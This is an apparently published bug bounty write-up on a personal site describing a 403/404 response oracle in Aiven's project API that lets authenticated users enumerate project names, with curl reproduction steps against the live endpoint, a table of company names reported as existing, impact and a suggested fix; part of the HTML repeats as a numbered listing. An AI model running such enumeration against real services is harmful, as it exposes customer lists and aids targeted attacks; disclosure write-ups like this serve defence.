security-research-notebook/project-name-enumeration/index.html

304 lines · html

<!doctype html>
<html lang="en"><head><meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Project Name Enumeration | Zion Boggan</title>
<meta name="description" content="403 vs 404 oracle on `/v1/project/&amp;lt;name&amp;gt;` enumerates the entire managed-services customer base.">
<link rel="icon" href="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 32 32'%3E%3Crect width='32' height='32' rx='6' fill='%230c0e12'/%3E%3Ctext x='16' y='22' font-family='monospace' font-size='15' fill='%236cc7b8' text-anchor='middle'%3Ezb%3C/text%3E%3C/svg%3E">
<style>
  :root{
    --bg:#0c0e12; --bg2:#0f1217; --panel:#14181f; --panel2:#171c24;
    --line:#222936; --line2:#2c3543;
    --ink:#e8eaed; --soft:#c3cad4; --muted:#8a94a3; --faint:#5d6675;
    --accent:#6cc7b8; --accent-dim:#274b47;
    --maxw:1020px;
  }
  *{box-sizing:border-box;}
  html{scroll-behavior:smooth;}
  body{margin:0;background:var(--bg);color:var(--ink);
    font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Helvetica,Arial,sans-serif;
    font-size:16px;line-height:1.65;-webkit-font-smoothing:antialiased;}
  .mono{font-family:ui-monospace,SFMono-Regular,"SF Mono",Menlo,Consolas,monospace;}
  a{color:var(--accent);text-decoration:none;}
  a:hover{color:#8fe0d2;}
  .wrap{max-width:var(--maxw);margin:0 auto;padding:0 24px;}
 
  /* nav */
  nav{position:sticky;top:0;z-index:20;background:rgba(12,14,18,.82);
    backdrop-filter:blur(10px);border-bottom:1px solid var(--line);}
  nav .wrap{display:flex;align-items:center;justify-content:space-between;height:58px;}
  nav .brand{font-weight:600;letter-spacing:.2px;}
  nav .brand .dot{color:var(--accent);}
  nav .links{display:flex;gap:26px;font-size:13.5px;}
  nav .links a{color:var(--muted);}
  nav .links a:hover{color:var(--ink);}
  @media(max-width:680px){nav .links{display:none;}}
 
  /* hero */
  header.hero{padding:74px 0 54px;border-bottom:1px solid var(--line);
    background:radial-gradient(900px 380px at 78% -10%, #11201e 0%, transparent 60%);}
  .avail{font-size:12.5px;letter-spacing:1.5px;text-transform:uppercase;color:var(--accent);
    display:flex;align-items:center;gap:9px;margin-bottom:20px;}
  .avail .pulse{width:7px;height:7px;border-radius:50%;background:var(--accent);
    box-shadow:0 0 0 0 rgba(108,199,184,.5);animation:p 2.4s infinite;}
  @keyframes p{0%{box-shadow:0 0 0 0 rgba(108,199,184,.45)}70%{box-shadow:0 0 0 8px rgba(108,199,184,0)}100%{box-shadow:0 0 0 0 rgba(108,199,184,0)}}
  h1{font-size:clamp(34px,6vw,52px);line-height:1.05;margin:0 0 8px;letter-spacing:-1px;font-weight:680;}
  .hero .sub{font-size:clamp(16px,2.4vw,20px);color:var(--soft);margin:0 0 24px;font-weight:500;}
  .hero .lede{max-width:660px;color:var(--soft);font-size:17px;margin:0 0 28px;}
  .hero .lede b{color:var(--ink);font-weight:600;}
  .cta{display:flex;flex-wrap:wrap;gap:12px;align-items:center;}
  .btn{display:inline-flex;align-items:center;gap:8px;padding:10px 18px;border-radius:8px;
    font-size:14.5px;font-weight:550;border:1px solid var(--line2);color:var(--ink);background:var(--panel);}
  .btn:hover{border-color:var(--accent-dim);background:var(--panel2);color:var(--ink);}
  .btn.primary{background:var(--accent);color:#06231f;border-color:var(--accent);font-weight:650;}
  .btn.primary:hover{background:#8fe0d2;color:#06231f;}
  .meta{margin-top:26px;display:flex;flex-wrap:wrap;gap:8px 22px;font-size:13px;color:var(--muted);}
  .meta .mono{color:var(--faint);}
 
  /* sections */
  section{padding:64px 0;border-bottom:1px solid var(--line);}
  .shead{display:flex;align-items:baseline;gap:14px;margin-bottom:30px;}
  .shead .idx{font-size:13px;color:var(--accent);letter-spacing:1px;}
  .shead h2{font-size:14px;letter-spacing:2px;text-transform:uppercase;color:var(--muted);margin:0;font-weight:600;}
  .shead .rule{flex:1;height:1px;background:var(--line);}
 
  /* flagship */
  .flag{background:linear-gradient(180deg,var(--panel) 0%,var(--bg2) 100%);
    border:1px solid var(--line2);border-radius:14px;overflow:hidden;}
  .flag .top{padding:30px 32px 8px;}
  .flag .tag{font-size:12px;letter-spacing:1.5px;text-transform:uppercase;color:var(--accent);margin-bottom:12px;}
  .flag h3{font-size:27px;margin:0 0 6px;letter-spacing:-.4px;}
  .flag h3 .v{font-size:13px;color:var(--muted);font-weight:500;margin-left:8px;letter-spacing:0;}
  .flag .grid{display:grid;grid-template-columns:1.25fr 1fr;gap:30px;padding:14px 32px 30px;}
  .flag p{color:var(--soft);margin:0 0 16px;}
  .flag .stats{display:grid;grid-template-columns:1fr 1fr;gap:12px;margin-top:6px;}
  .stat{background:var(--bg);border:1px solid var(--line);border-radius:9px;padding:13px 15px;}
  .stat .n{font-size:21px;font-weight:680;color:var(--ink);}
  .stat .k{font-size:12px;color:var(--muted);margin-top:2px;}
  .spec{background:var(--bg);border:1px solid var(--line);border-radius:10px;padding:18px 18px;}
  .spec .sk{font-size:11px;letter-spacing:1.5px;text-transform:uppercase;color:var(--faint);margin-bottom:10px;}
  .spec ul{margin:0;padding:0;list-style:none;font-size:13.5px;}
  .spec li{padding:6px 0;border-top:1px solid var(--line);color:var(--soft);display:flex;justify-content:space-between;gap:14px;}
  .spec li:first-child{border-top:none;}
  .spec li span{color:var(--muted);}
  .flag .foot{padding:0 32px 28px;display:flex;gap:18px;flex-wrap:wrap;font-size:14px;}
  @media(max-width:720px){.flag .grid{grid-template-columns:1fr;}}
 
  /* lab cards */
  .cards{display:grid;grid-template-columns:1fr 1fr;gap:20px;}
  @media(max-width:680px){.cards{grid-template-columns:1fr;}}
  .card{border:1px solid var(--line);border-radius:12px;overflow:hidden;background:var(--panel);
    display:flex;flex-direction:column;transition:border-color .15s,transform .15s;}
  .card:hover{border-color:var(--accent-dim);transform:translateY(-2px);}
  .card .thumb{height:172px;overflow:hidden;border-bottom:1px solid var(--line);background:#fff;}
  .card .thumb img{width:100%;height:100%;object-fit:cover;object-position:top left;display:block;}
  .card .body{padding:18px 20px 20px;display:flex;flex-direction:column;flex:1;}
  .card h3{margin:0 0 9px;font-size:17px;}
  .card p{margin:0 0 14px;font-size:14px;color:var(--soft);flex:1;}
  .tags{display:flex;flex-wrap:wrap;gap:6px;margin-bottom:14px;}
  .tags span{font-size:11.5px;color:var(--muted);background:var(--bg);border:1px solid var(--line);
    border-radius:5px;padding:3px 8px;}
  .card .lnk{font-size:13.5px;font-family:ui-monospace,Menlo,monospace;}
  .card .lnk::after{content:" →";}
 
  /* research */
  .rlede{color:var(--soft);max-width:680px;margin:-6px 0 26px;}
  .research{display:flex;flex-direction:column;gap:0;border:1px solid var(--line);border-radius:12px;overflow:hidden;}
  .ritem{display:grid;grid-template-columns:120px 1fr auto;gap:18px;align-items:center;
    padding:18px 22px;border-top:1px solid var(--line);}
  .ritem:first-child{border-top:none;}
  .ritem:hover{background:var(--panel);}
  .ritem .cls{font-size:11px;letter-spacing:.5px;text-transform:uppercase;color:var(--accent);}
  .ritem h3{margin:0 0 3px;font-size:16px;}
  .ritem p{margin:0;font-size:13.5px;color:var(--muted);}
  .ritem .go{font-family:ui-monospace,Menlo,monospace;font-size:13px;white-space:nowrap;}
  @media(max-width:680px){.ritem{grid-template-columns:1fr;gap:6px;}.ritem .go{margin-top:4px;}}
  .progs{margin-top:22px;}
  .progs .sk{font-size:11px;letter-spacing:1.5px;text-transform:uppercase;color:var(--faint);margin-bottom:11px;}
  .progs .row{display:flex;flex-wrap:wrap;gap:7px;}
  .progs .row span{font-size:12.5px;color:var(--soft);background:var(--panel);border:1px solid var(--line);
    border-radius:6px;padding:4px 10px;}
 
  /* credentials */
  .cred{display:grid;grid-template-columns:1.1fr 1fr;gap:28px;}
  @media(max-width:680px){.cred{grid-template-columns:1fr;}}
  .cred p{color:var(--soft);margin:0 0 14px;}
  .cred .role{font-size:14px;color:var(--muted);}
  .cred .role b{color:var(--ink);font-weight:600;}
  .certs{list-style:none;margin:0;padding:0;}
  .certs li{padding:9px 0;border-top:1px solid var(--line);font-size:14px;color:var(--soft);
    display:flex;gap:10px;align-items:baseline;}
  .certs li:first-child{border-top:none;}
  .certs li .c{color:var(--accent);font-family:ui-monospace,Menlo,monospace;font-size:12px;}
 
  footer{padding:46px 0 64px;}
  footer .row{display:flex;flex-wrap:wrap;justify-content:space-between;gap:18px;align-items:center;}
  footer .links a{color:var(--soft);margin-right:20px;font-size:14px;}
  footer .note{color:var(--faint);font-size:12.5px;max-width:520px;}
 
  .detail-hero{padding:40px 0 26px;}
  .back{display:inline-block;font-size:13px;color:var(--muted);margin-bottom:20px;font-family:ui-monospace,Menlo,monospace;}
  .back:hover{color:var(--ink);}
  .kicker{font-size:12px;letter-spacing:2px;text-transform:uppercase;color:var(--accent);margin-bottom:13px;font-family:ui-monospace,Menlo,monospace;}
  .detail-hero h1{font-size:clamp(26px,4.6vw,38px);margin:0 0 12px;letter-spacing:-.5px;}
  .detail-hero .tagline{font-size:clamp(15px,2vw,18px);color:var(--soft);max-width:800px;margin:0 0 16px;}
  .facts{display:grid;grid-template-columns:repeat(auto-fit,minmax(150px,1fr));gap:12px;margin-top:22px;}
  .content{padding:8px 0 0;max-width:840px;}
  .content h1{font-size:24px;margin:40px 0 14px;letter-spacing:-.4px;color:var(--ink);}
  .content h2{font-size:13px;letter-spacing:2px;text-transform:uppercase;color:var(--muted);margin:42px 0 15px;font-weight:600;border-top:1px solid var(--line);padding-top:28px;}
  .content h3{font-size:17px;margin:28px 0 10px;color:var(--ink);font-weight:600;}
  .content h4{font-size:14px;margin:22px 0 8px;color:var(--soft);font-weight:600;text-transform:uppercase;letter-spacing:.5px;}
  .content p{color:var(--soft);margin:0 0 15px;}
  .content ul,.content ol{color:var(--soft);margin:0 0 15px;padding-left:22px;}
  .content li{margin:5px 0;}
  .content strong{color:var(--ink);font-weight:600;}
  .content a{color:var(--accent);}
  .content code{font-family:ui-monospace,Menlo,monospace;font-size:12.8px;background:var(--panel2);border:1px solid var(--line);border-radius:4px;padding:1px 5px;color:var(--soft);}
  .content pre{background:var(--bg2);border:1px solid var(--line2);border-radius:10px;padding:15px 18px;overflow-x:auto;margin:0 0 18px;}
  .content pre code{background:none;border:none;padding:0;font-size:12.4px;color:var(--soft);line-height:1.6;white-space:pre;}
  .content table{width:100%;border-collapse:collapse;margin:2px 0 20px;font-size:13.3px;}
  .content th{text-align:left;color:var(--muted);font-weight:600;border-bottom:1px solid var(--line2);padding:9px 12px;font-size:11px;letter-spacing:.6px;text-transform:uppercase;}
  .content td{color:var(--soft);border-bottom:1px solid var(--line);padding:9px 12px;vertical-align:top;}
  .content blockquote{border-left:3px solid var(--accent-dim);margin:0 0 16px;padding:2px 0 2px 18px;color:var(--muted);}
  .content hr{border:none;border-top:1px solid var(--line);margin:30px 0;}
  /* notebook index */
  .nbgroup{margin:40px 0 0;}
  .nbgroup h2{font-size:13px;letter-spacing:2px;text-transform:uppercase;color:var(--accent);margin:0 0 4px;font-weight:600;}
  .nbgroup .gd{color:var(--faint);font-size:13px;margin:0 0 14px;}
  .nbtable{width:100%;border-collapse:collapse;font-size:14px;border:1px solid var(--line);border-radius:12px;overflow:hidden;}
  .nbtable tr{border-top:1px solid var(--line);}
  .nbtable tr:first-child{border-top:none;}
  .nbtable tr:hover{background:var(--panel);}
  .nbtable td{padding:14px 16px;vertical-align:top;}
  .nbtable .cls{white-space:nowrap;color:var(--accent);font-family:ui-monospace,Menlo,monospace;font-size:11.5px;text-transform:uppercase;letter-spacing:.5px;width:150px;}
  .nbtable .ti a{font-weight:600;color:var(--ink);}
  .nbtable .ti a:hover{color:var(--accent);}
  .nbtable .ol{color:var(--muted);font-size:13px;margin-top:3px;}
  @media(max-width:680px){.nbtable .cls{width:auto;display:block;}}
</style>
<link rel="canonical" href="https://zionboggan.com/security-research-notebook/project-name-enumeration/">
<meta name="author" content="Zion Boggan">
<meta name="robots" content="index, follow, max-image-preview:large">
<meta property="og:type" content="article">
<meta property="og:site_name" content="Zion Boggan">
<meta property="og:title" content="Project Name Enumeration | Zion Boggan">
<meta property="og:description" content="403 vs 404 oracle on `/v1/project/&amp;lt;name&amp;gt;` enumerates the entire managed-services customer base.">
<meta property="og:url" content="https://zionboggan.com/security-research-notebook/project-name-enumeration/">
<meta property="og:image" content="https://zionboggan.com/assets/og-default.png">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:title" content="Project Name Enumeration | Zion Boggan">
<meta name="twitter:description" content="403 vs 404 oracle on `/v1/project/&amp;lt;name&amp;gt;` enumerates the entire managed-services customer base.">
<meta name="twitter:image" content="https://zionboggan.com/assets/og-default.png">
<script type="application/ld+json">{"@context":"https://schema.org","@type":"TechArticle","headline":"Project Name Enumeration","description":"403 vs 404 oracle on `/v1/project/&amp;lt;name&amp;gt;` enumerates the entire managed-services customer base.","url":"https://zionboggan.com/security-research-notebook/project-name-enumeration/","image":"https://zionboggan.com/assets/og-default.png","author":{"@type":"Person","name":"Zion Boggan","url":"https://zionboggan.com"},"publisher":{"@type":"Person","name":"Zion Boggan"}}</script>
</head><body>
<nav><div class="wrap">
  <a class="brand mono" href="/" style="color:var(--ink)">zion_boggan<span class="dot">.</span></a>
  <span class="links"><a href="/#oversight">Oversight</a><a href="/#labs">Labs</a><a href="/#research">Research</a><a href="/security-research-notebook/">Notebook</a><a href="/">Home</a></span>
</div></nav>
<header class="hero detail-hero"><div class="wrap">
  <a class="back" href="/security-research-notebook/">&larr; Research notebook</a>
  <div class="kicker">Info disclosure</div>
  <h1>Project Name Enumeration</h1>
</div></header>
<section><div class="wrap"><div class="content">
<h1>SUBMISSION 1</h1>
<p>TITLE: Project Name Enumeration via 403/404 Response Differentiation Leaks Customer List</p>
<p>TARGET: api.aiven.io (https://api.aiven.io/login)</p>
<p>VRT CATEGORY: Server Security Misconfiguration &gt; Information Disclosure</p>
<p>URL: https://api.aiven.io/v1/project/{project_name}</p>
<h2>DESCRIPTION:</h2>
<h2>Summary</h2>
<p>The <code>GET /v1/project/{project_name}</code> endpoint returns differentiated HTTP responses for existing vs non-existing projects, allowing any authenticated user to enumerate all project names on the Aiven platform. Since project names frequently match company or organization names, this directly reveals Aiven&rsquo;s customer list.</p>
<ul>
<li>Existing project (not owned by requester): <strong>403</strong>, <code>"Not a project member"</code></li>
<li>Non-existing project: <strong>404</strong>, <code>"Project does not exist"</code></li>
</ul>
<h2>Steps to Reproduce</h2>
<ol>
<li>
<p>Authenticate to the Aiven API with any valid token.</p>
</li>
<li>
<p>Query existing project name:</p>
</li>
</ol>
<pre><code class="language-bash">curl -s https://api.aiven.io/v1/project/netflix \
  -H &quot;Authorization: aivenv1 &lt;TOKEN&gt;&quot;
</code></pre>
<p><strong>Response (403):</strong></p>
<pre><code class="language-json">{&quot;errors&quot;:[{&quot;message&quot;:&quot;Not a project member&quot;,&quot;status&quot;:403}]}
</code></pre>
<ol start="3">
<li>Query non-existing project name:</li>
</ol>
<pre><code class="language-bash">curl -s https://api.aiven.io/v1/project/doesnotexist12345xyz \
  -H &quot;Authorization: aivenv1 &lt;TOKEN&gt;&quot;
</code></pre>
<p><strong>Response (404):</strong></p>
<pre><code class="language-json">{&quot;errors&quot;:[{&quot;message&quot;:&quot;Project does not exist&quot;,&quot;status&quot;:404}]}
</code></pre>
<ol start="4">
<li>The 403/404 differentiation confirms whether a project name exists on the platform.</li>
</ol>
<h2>Confirmed Existing Projects</h2>
<table>
<thead>
<tr>
<th>Project Name</th>
<th>HTTP Status</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>netflix</code></td>
<td>403 (exists)</td>
</tr>
<tr>
<td><code>spotify</code></td>
<td>403 (exists)</td>
</tr>
<tr>
<td><code>google</code></td>
<td>403 (exists)</td>
</tr>
<tr>
<td><code>facebook</code></td>
<td>403 (exists)</td>
</tr>
<tr>
<td><code>tesla</code></td>
<td>403 (exists)</td>
</tr>
<tr>
<td><code>databricks</code></td>
<td>403 (exists)</td>
</tr>
<tr>
<td><code>redis</code></td>
<td>403 (exists)</td>
</tr>
<tr>
<td><code>grafana</code></td>
<td>403 (exists)</td>
</tr>
<tr>
<td><code>production</code></td>
<td>403 (exists)</td>
</tr>
<tr>
<td><code>internal</code></td>
<td>403 (exists)</td>
</tr>
</tbody>
</table>
<p>Controls: <code>doesnotexist12345xyz</code>, <code>another-fake-project-abc</code> → 404.</p>
<h2>Impact</h2>
<p>An attacker can enumerate Aiven&rsquo;s customer base by iterating company names against this endpoint. This reveals which organizations use Aiven for their database infrastructure, commercially sensitive information that enables competitive intelligence gathering and targeted supply chain attacks against confirmed Aiven customers.</p>
<h2>Suggested Fix</h2>
<p>Return a uniform <code>404 "Project does not exist"</code> for both non-existing projects and projects the requester doesn&rsquo;t have access to.</p>
<hr><p style="color:var(--faint);font-size:12.5px;font-family:ui-monospace,Menlo,monospace">Source &middot; github.com/zionboggan/security-research-notebook &middot; writeups/aiven/project-name-enumeration.md</p>
</div></div></section>
<footer><div class="wrap row">
  <div class="links"><a href="/">Portfolio</a><a href="https://www.linkedin.com/in/zion-boggan">LinkedIn</a><a href="/security-research-notebook/">Notebook</a><a href="mailto:zionboggan0@gmail.com">Email</a></div>
  <div class="note">Coordinated-disclosure research. Findings appear here only after the program's disclosure window closed, the patch shipped, or a CVE was published. No customer data was accessed.</div>
</div></footer>
</body></html>

1	<!doctype html>
2	<html lang="en"><head><meta charset="utf-8">
3	<meta name="viewport" content="width=device-width, initial-scale=1.0">
4	<title>Project Name Enumeration \| Zion Boggan</title>
5	<meta name="description" content="403 vs 404 oracle on `/v1/project/&lt;name&gt;` enumerates the entire managed-services customer base.">
6	<link rel="icon" href="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 32 32'%3E%3Crect width='32' height='32' rx='6' fill='%230c0e12'/%3E%3Ctext x='16' y='22' font-family='monospace' font-size='15' fill='%236cc7b8' text-anchor='middle'%3Ezb%3C/text%3E%3C/svg%3E">
7	<style>
8	:root{
9	--bg:#0c0e12; --bg2:#0f1217; --panel:#14181f; --panel2:#171c24;
10	--line:#222936; --line2:#2c3543;
11	--ink:#e8eaed; --soft:#c3cad4; --muted:#8a94a3; --faint:#5d6675;
12	--accent:#6cc7b8; --accent-dim:#274b47;
13	--maxw:1020px;
14	}
15	*{box-sizing:border-box;}
16	html{scroll-behavior:smooth;}
17	body{margin:0;background:var(--bg);color:var(--ink);
18	font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Helvetica,Arial,sans-serif;
19	font-size:16px;line-height:1.65;-webkit-font-smoothing:antialiased;}
20	.mono{font-family:ui-monospace,SFMono-Regular,"SF Mono",Menlo,Consolas,monospace;}
21	a{color:var(--accent);text-decoration:none;}
22	a:hover{color:#8fe0d2;}
23	.wrap{max-width:var(--maxw);margin:0 auto;padding:0 24px;}
24
25	/* nav */
26	nav{position:sticky;top:0;z-index:20;background:rgba(12,14,18,.82);
27	backdrop-filter:blur(10px);border-bottom:1px solid var(--line);}
28	nav .wrap{display:flex;align-items:center;justify-content:space-between;height:58px;}
29	nav .brand{font-weight:600;letter-spacing:.2px;}
30	nav .brand .dot{color:var(--accent);}
31	nav .links{display:flex;gap:26px;font-size:13.5px;}
32	nav .links a{color:var(--muted);}
33	nav .links a:hover{color:var(--ink);}
34	@media(max-width:680px){nav .links{display:none;}}
35
36	/* hero */
37	header.hero{padding:74px 0 54px;border-bottom:1px solid var(--line);
38	background:radial-gradient(900px 380px at 78% -10%, #11201e 0%, transparent 60%);}
39	.avail{font-size:12.5px;letter-spacing:1.5px;text-transform:uppercase;color:var(--accent);
40	display:flex;align-items:center;gap:9px;margin-bottom:20px;}
41	.avail .pulse{width:7px;height:7px;border-radius:50%;background:var(--accent);
42	box-shadow:0 0 0 0 rgba(108,199,184,.5);animation:p 2.4s infinite;}
43	@keyframes p{0%{box-shadow:0 0 0 0 rgba(108,199,184,.45)}70%{box-shadow:0 0 0 8px rgba(108,199,184,0)}100%{box-shadow:0 0 0 0 rgba(108,199,184,0)}}
44	h1{font-size:clamp(34px,6vw,52px);line-height:1.05;margin:0 0 8px;letter-spacing:-1px;font-weight:680;}
45	.hero .sub{font-size:clamp(16px,2.4vw,20px);color:var(--soft);margin:0 0 24px;font-weight:500;}
46	.hero .lede{max-width:660px;color:var(--soft);font-size:17px;margin:0 0 28px;}
47	.hero .lede b{color:var(--ink);font-weight:600;}
48	.cta{display:flex;flex-wrap:wrap;gap:12px;align-items:center;}
49	.btn{display:inline-flex;align-items:center;gap:8px;padding:10px 18px;border-radius:8px;
50	font-size:14.5px;font-weight:550;border:1px solid var(--line2);color:var(--ink);background:var(--panel);}
51	.btn:hover{border-color:var(--accent-dim);background:var(--panel2);color:var(--ink);}
52	.btn.primary{background:var(--accent);color:#06231f;border-color:var(--accent);font-weight:650;}
53	.btn.primary:hover{background:#8fe0d2;color:#06231f;}
54	.meta{margin-top:26px;display:flex;flex-wrap:wrap;gap:8px 22px;font-size:13px;color:var(--muted);}
55	.meta .mono{color:var(--faint);}
56
57	/* sections */
58	section{padding:64px 0;border-bottom:1px solid var(--line);}
59	.shead{display:flex;align-items:baseline;gap:14px;margin-bottom:30px;}
60	.shead .idx{font-size:13px;color:var(--accent);letter-spacing:1px;}
61	.shead h2{font-size:14px;letter-spacing:2px;text-transform:uppercase;color:var(--muted);margin:0;font-weight:600;}
62	.shead .rule{flex:1;height:1px;background:var(--line);}
63
64	/* flagship */
65	.flag{background:linear-gradient(180deg,var(--panel) 0%,var(--bg2) 100%);
66	border:1px solid var(--line2);border-radius:14px;overflow:hidden;}
67	.flag .top{padding:30px 32px 8px;}
68	.flag .tag{font-size:12px;letter-spacing:1.5px;text-transform:uppercase;color:var(--accent);margin-bottom:12px;}
69	.flag h3{font-size:27px;margin:0 0 6px;letter-spacing:-.4px;}
70	.flag h3 .v{font-size:13px;color:var(--muted);font-weight:500;margin-left:8px;letter-spacing:0;}
71	.flag .grid{display:grid;grid-template-columns:1.25fr 1fr;gap:30px;padding:14px 32px 30px;}
72	.flag p{color:var(--soft);margin:0 0 16px;}
73	.flag .stats{display:grid;grid-template-columns:1fr 1fr;gap:12px;margin-top:6px;}
74	.stat{background:var(--bg);border:1px solid var(--line);border-radius:9px;padding:13px 15px;}
75	.stat .n{font-size:21px;font-weight:680;color:var(--ink);}
76	.stat .k{font-size:12px;color:var(--muted);margin-top:2px;}
77	.spec{background:var(--bg);border:1px solid var(--line);border-radius:10px;padding:18px 18px;}
78	.spec .sk{font-size:11px;letter-spacing:1.5px;text-transform:uppercase;color:var(--faint);margin-bottom:10px;}
79	.spec ul{margin:0;padding:0;list-style:none;font-size:13.5px;}
80	.spec li{padding:6px 0;border-top:1px solid var(--line);color:var(--soft);display:flex;justify-content:space-between;gap:14px;}
81	.spec li:first-child{border-top:none;}
82	.spec li span{color:var(--muted);}
83	.flag .foot{padding:0 32px 28px;display:flex;gap:18px;flex-wrap:wrap;font-size:14px;}
84	@media(max-width:720px){.flag .grid{grid-template-columns:1fr;}}
85
86	/* lab cards */
87	.cards{display:grid;grid-template-columns:1fr 1fr;gap:20px;}
88	@media(max-width:680px){.cards{grid-template-columns:1fr;}}
89	.card{border:1px solid var(--line);border-radius:12px;overflow:hidden;background:var(--panel);
90	display:flex;flex-direction:column;transition:border-color .15s,transform .15s;}
91	.card:hover{border-color:var(--accent-dim);transform:translateY(-2px);}
92	.card .thumb{height:172px;overflow:hidden;border-bottom:1px solid var(--line);background:#fff;}
93	.card .thumb img{width:100%;height:100%;object-fit:cover;object-position:top left;display:block;}
94	.card .body{padding:18px 20px 20px;display:flex;flex-direction:column;flex:1;}
95	.card h3{margin:0 0 9px;font-size:17px;}
96	.card p{margin:0 0 14px;font-size:14px;color:var(--soft);flex:1;}
97	.tags{display:flex;flex-wrap:wrap;gap:6px;margin-bottom:14px;}
98	.tags span{font-size:11.5px;color:var(--muted);background:var(--bg);border:1px solid var(--line);
99	border-radius:5px;padding:3px 8px;}
100	.card .lnk{font-size:13.5px;font-family:ui-monospace,Menlo,monospace;}
101	.card .lnk::after{content:" →";}
102
103	/* research */
104	.rlede{color:var(--soft);max-width:680px;margin:-6px 0 26px;}
105	.research{display:flex;flex-direction:column;gap:0;border:1px solid var(--line);border-radius:12px;overflow:hidden;}
106	.ritem{display:grid;grid-template-columns:120px 1fr auto;gap:18px;align-items:center;
107	padding:18px 22px;border-top:1px solid var(--line);}
108	.ritem:first-child{border-top:none;}
109	.ritem:hover{background:var(--panel);}
110	.ritem .cls{font-size:11px;letter-spacing:.5px;text-transform:uppercase;color:var(--accent);}
111	.ritem h3{margin:0 0 3px;font-size:16px;}
112	.ritem p{margin:0;font-size:13.5px;color:var(--muted);}
113	.ritem .go{font-family:ui-monospace,Menlo,monospace;font-size:13px;white-space:nowrap;}
114	@media(max-width:680px){.ritem{grid-template-columns:1fr;gap:6px;}.ritem .go{margin-top:4px;}}
115	.progs{margin-top:22px;}
116	.progs .sk{font-size:11px;letter-spacing:1.5px;text-transform:uppercase;color:var(--faint);margin-bottom:11px;}
117	.progs .row{display:flex;flex-wrap:wrap;gap:7px;}
118	.progs .row span{font-size:12.5px;color:var(--soft);background:var(--panel);border:1px solid var(--line);
119	border-radius:6px;padding:4px 10px;}
120
121	/* credentials */
122	.cred{display:grid;grid-template-columns:1.1fr 1fr;gap:28px;}
123	@media(max-width:680px){.cred{grid-template-columns:1fr;}}
124	.cred p{color:var(--soft);margin:0 0 14px;}
125	.cred .role{font-size:14px;color:var(--muted);}
126	.cred .role b{color:var(--ink);font-weight:600;}
127	.certs{list-style:none;margin:0;padding:0;}
128	.certs li{padding:9px 0;border-top:1px solid var(--line);font-size:14px;color:var(--soft);
129	display:flex;gap:10px;align-items:baseline;}
130	.certs li:first-child{border-top:none;}
131	.certs li .c{color:var(--accent);font-family:ui-monospace,Menlo,monospace;font-size:12px;}
132
133	footer{padding:46px 0 64px;}
134	footer .row{display:flex;flex-wrap:wrap;justify-content:space-between;gap:18px;align-items:center;}
135	footer .links a{color:var(--soft);margin-right:20px;font-size:14px;}
136	footer .note{color:var(--faint);font-size:12.5px;max-width:520px;}
137
138	.detail-hero{padding:40px 0 26px;}
139	.back{display:inline-block;font-size:13px;color:var(--muted);margin-bottom:20px;font-family:ui-monospace,Menlo,monospace;}
140	.back:hover{color:var(--ink);}
141	.kicker{font-size:12px;letter-spacing:2px;text-transform:uppercase;color:var(--accent);margin-bottom:13px;font-family:ui-monospace,Menlo,monospace;}
142	.detail-hero h1{font-size:clamp(26px,4.6vw,38px);margin:0 0 12px;letter-spacing:-.5px;}
143	.detail-hero .tagline{font-size:clamp(15px,2vw,18px);color:var(--soft);max-width:800px;margin:0 0 16px;}
144	.facts{display:grid;grid-template-columns:repeat(auto-fit,minmax(150px,1fr));gap:12px;margin-top:22px;}
145	.content{padding:8px 0 0;max-width:840px;}
146	.content h1{font-size:24px;margin:40px 0 14px;letter-spacing:-.4px;color:var(--ink);}
147	.content h2{font-size:13px;letter-spacing:2px;text-transform:uppercase;color:var(--muted);margin:42px 0 15px;font-weight:600;border-top:1px solid var(--line);padding-top:28px;}
148	.content h3{font-size:17px;margin:28px 0 10px;color:var(--ink);font-weight:600;}
149	.content h4{font-size:14px;margin:22px 0 8px;color:var(--soft);font-weight:600;text-transform:uppercase;letter-spacing:.5px;}
150	.content p{color:var(--soft);margin:0 0 15px;}
151	.content ul,.content ol{color:var(--soft);margin:0 0 15px;padding-left:22px;}
152	.content li{margin:5px 0;}
153	.content strong{color:var(--ink);font-weight:600;}
154	.content a{color:var(--accent);}
155	.content code{font-family:ui-monospace,Menlo,monospace;font-size:12.8px;background:var(--panel2);border:1px solid var(--line);border-radius:4px;padding:1px 5px;color:var(--soft);}
156	.content pre{background:var(--bg2);border:1px solid var(--line2);border-radius:10px;padding:15px 18px;overflow-x:auto;margin:0 0 18px;}
157	.content pre code{background:none;border:none;padding:0;font-size:12.4px;color:var(--soft);line-height:1.6;white-space:pre;}
158	.content table{width:100%;border-collapse:collapse;margin:2px 0 20px;font-size:13.3px;}
159	.content th{text-align:left;color:var(--muted);font-weight:600;border-bottom:1px solid var(--line2);padding:9px 12px;font-size:11px;letter-spacing:.6px;text-transform:uppercase;}
160	.content td{color:var(--soft);border-bottom:1px solid var(--line);padding:9px 12px;vertical-align:top;}
161	.content blockquote{border-left:3px solid var(--accent-dim);margin:0 0 16px;padding:2px 0 2px 18px;color:var(--muted);}
162	.content hr{border:none;border-top:1px solid var(--line);margin:30px 0;}
163	/* notebook index */
164	.nbgroup{margin:40px 0 0;}
165	.nbgroup h2{font-size:13px;letter-spacing:2px;text-transform:uppercase;color:var(--accent);margin:0 0 4px;font-weight:600;}
166	.nbgroup .gd{color:var(--faint);font-size:13px;margin:0 0 14px;}
167	.nbtable{width:100%;border-collapse:collapse;font-size:14px;border:1px solid var(--line);border-radius:12px;overflow:hidden;}
168	.nbtable tr{border-top:1px solid var(--line);}
169	.nbtable tr:first-child{border-top:none;}
170	.nbtable tr:hover{background:var(--panel);}
171	.nbtable td{padding:14px 16px;vertical-align:top;}
172	.nbtable .cls{white-space:nowrap;color:var(--accent);font-family:ui-monospace,Menlo,monospace;font-size:11.5px;text-transform:uppercase;letter-spacing:.5px;width:150px;}
173	.nbtable .ti a{font-weight:600;color:var(--ink);}
174	.nbtable .ti a:hover{color:var(--accent);}
175	.nbtable .ol{color:var(--muted);font-size:13px;margin-top:3px;}
176	@media(max-width:680px){.nbtable .cls{width:auto;display:block;}}
177	</style>
178	<link rel="canonical" href="https://zionboggan.com/security-research-notebook/project-name-enumeration/">
179	<meta name="author" content="Zion Boggan">
